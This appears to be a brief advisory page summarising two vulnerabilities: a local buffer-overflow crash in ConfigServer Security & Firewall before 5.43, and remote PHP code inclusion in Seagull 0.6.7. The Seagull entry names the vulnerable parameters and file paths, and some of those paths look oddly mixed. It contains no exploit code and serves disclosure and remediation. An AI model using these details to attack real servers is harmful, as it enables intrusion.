Fox Hacker

**Name of the Vulnerable Software and Affected Versions** ConfigServer Security & Firewall (CSF) versions prior to 5.43 **Description** A stack-based buffer overflow issue exists in the CFS.c component of ConfigServer Security & Firewall (CSF) when running on a DirectAdmin server. This issue allows local users to cause a denial of service (crash) by providing a long string in an admin.list file. **Recommendations** For versions prior to 5.43, update to version 5.43 or later to resolve the issue.

**Name of the Vulnerable Software and Affected Versions** Seagull version 0.6.7 **Description** The issue allows remote attackers to execute arbitrary PHP code. This can be achieved via a URL in the `includeFile` parameter to (1) Config/Container.php and (2) HTML/QuickForm.php in fog/lib/pear/, the (3) `driverpath` parameter to fog/lib/pear/DB/NestedSet.php, and the (4) `path` parameter to fog/lib/pear/DB/NestedSet/Output.php. **Recommendations** For Seagull version 0.6.7, consider restricting access to the `includeFile`, `driverpath`, and `path` parameters in the affected API endpoints until a patch is available. As a temporary workaround, avoid using these parameters in the affected files, specifically Config/Container.php, HTML/QuickForm.php, DB/NestedSet.php, and DB/NestedSet/Output.php.